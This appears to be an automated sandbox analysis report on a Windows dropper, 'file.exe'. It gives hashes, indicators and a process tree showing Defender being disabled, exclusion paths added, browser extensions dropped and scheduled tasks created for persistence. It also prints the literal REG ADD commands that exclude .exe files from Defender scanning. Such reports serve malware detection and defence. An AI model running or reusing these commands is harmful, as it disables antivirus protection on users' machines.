Analysis
-
max time kernel
127s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
14/01/2023, 15:36
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3fb8abb5e400eb728d0707064f8515bd
-
SHA1
b3cb18dd958b5ca635c5ba06b809f194a28e587d
-
SHA256
7d0e01fba8b5c7fca01f89555d66dd2839f2006c5bc3dbb37c8890017e694639
-
SHA512
330b5b61c808ae48121b41207a35bbaa40d1d97c0deb2f4772b0b94e357dfb1219b06d3c8bca1cd3a9bcdd11e5726b791148df66d2f3e274f314f6ab4402cad5
-
SSDEEP
196608:91OLdnL6FfzgPdM3XhsHpeYzUNB6LPBVqE3IshqIIxJCMrp:3OLdneZsPdM3mH/KmPPIsI1m2p
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLRqzGmYJgsU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JtLkyMWteakTC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JtLkyMWteakTC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AMqrrxjlU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XjHlGSKYxAVPjBec = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twjvPogQWztidxzVwKR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLRqzGmYJgsU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ZWvXpCnXnXECFEVB = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OGTLbgiSVWUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ZWvXpCnXnXECFEVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XjHlGSKYxAVPjBec = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AMqrrxjlU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OGTLbgiSVWUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twjvPogQWztidxzVwKR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XjHlGSKYxAVPjBec = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XjHlGSKYxAVPjBec = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 820 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 872 Install.exe 468 Install.exe 1084 bQoDNKF.exe 1008 CBBXxrB.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\International\Geo\Nation CBBXxrB.exe -
Loads dropped DLL 12 IoCs
pid Process 1316 file.exe 872 Install.exe 872 Install.exe 872 Install.exe 872 Install.exe 468 Install.exe 468 Install.exe 468 Install.exe 820 rundll32.exe 820 rundll32.exe 820 rundll32.exe 820 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json CBBXxrB.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_852D9DBA07B581B14174BE9FF7802AAB CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bQoDNKF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_852D9DBA07B581B14174BE9FF7802AAB CBBXxrB.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bQoDNKF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CBBXxrB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 CBBXxrB.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CBBXxrB.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bQoDNKF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CBBXxrB.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\twjvPogQWztidxzVwKR\kStgpuN.dll CBBXxrB.exe File created C:\Program Files (x86)\twjvPogQWztidxzVwKR\yPoIqte.xml CBBXxrB.exe File created C:\Program Files (x86)\JtLkyMWteakTC\GXTqrSl.dll CBBXxrB.exe File created C:\Program Files (x86)\JtLkyMWteakTC\hnLYQcn.xml CBBXxrB.exe File created C:\Program Files (x86)\AMqrrxjlU\VBdluO.dll CBBXxrB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CBBXxrB.exe File created C:\Program Files (x86)\AMqrrxjlU\zSpSCQD.xml CBBXxrB.exe File created C:\Program Files (x86)\kLRqzGmYJgsU2\iVKBjdAlSuiOo.dll CBBXxrB.exe File created C:\Program Files (x86)\kLRqzGmYJgsU2\UWvwquc.xml CBBXxrB.exe File created C:\Program Files (x86)\OGTLbgiSVWUn\NYQtURr.dll CBBXxrB.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CBBXxrB.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CBBXxrB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CBBXxrB.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\rqvLerMPUMdrWDDQN.job schtasks.exe File created C:\Windows\Tasks\bdfoyumcZcUHpblShd.job schtasks.exe File created C:\Windows\Tasks\OiTltHgjKWdZWRHAU.job schtasks.exe File created C:\Windows\Tasks\mATwwnhlBarNIjG.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 580 schtasks.exe 1888 schtasks.exe 1304 schtasks.exe 524 schtasks.exe 1680 schtasks.exe 1232 schtasks.exe 1732 schtasks.exe 1232 schtasks.exe 1740 schtasks.exe 916 schtasks.exe 240 schtasks.exe 556 schtasks.exe 1680 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{41DC94A8-3232-42FE-B62E-4F0001F395FC}\WpadDecisionTime = 10fe82943628d901 CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs CBBXxrB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" CBBXxrB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0037000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{41DC94A8-3232-42FE-B62E-4F0001F395FC} CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed CBBXxrB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates CBBXxrB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0037000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89 CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople CBBXxrB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates CBBXxrB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{41DC94A8-3232-42FE-B62E-4F0001F395FC}\5a-60-4c-ec-88-89 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 CBBXxrB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{41DC94A8-3232-42FE-B62E-4F0001F395FC}\WpadDecisionReason = "1" CBBXxrB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89\WpadDecisionReason = "1" CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections CBBXxrB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89\WpadDecisionTime = 10fe82943628d901 CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-60-4c-ec-88-89\WpadDecisionTime = 10fe82943628d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople CBBXxrB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 CBBXxrB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot CBBXxrB.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1756 powershell.EXE 1756 powershell.EXE 1756 powershell.EXE 1672 powershell.EXE 1672 powershell.EXE 1672 powershell.EXE 316 powershell.EXE 316 powershell.EXE 316 powershell.EXE 1924 powershell.EXE 1924 powershell.EXE 1924 powershell.EXE 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe 1008 CBBXxrB.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1756 powershell.EXE Token: SeDebugPrivilege 1672 powershell.EXE Token: SeDebugPrivilege 316 powershell.EXE Token: SeDebugPrivilege 1924 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 1316 wrote to memory of 872 1316 file.exe 27 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 872 wrote to memory of 468 872 Install.exe 28 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1044 468 Install.exe 30 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 468 wrote to memory of 1360 468 Install.exe 32 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1044 wrote to memory of 1824 1044 forfiles.exe 34 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1360 wrote to memory of 972 1360 forfiles.exe 35 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 1824 wrote to memory of 1104 1824 cmd.exe 36 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 432 972 cmd.exe 37 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 972 wrote to memory of 324 972 cmd.exe 39 PID 1824 wrote to memory of 1888 1824 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\7zS1278.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Users\Admin\AppData\Local\Temp\7zS1640.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
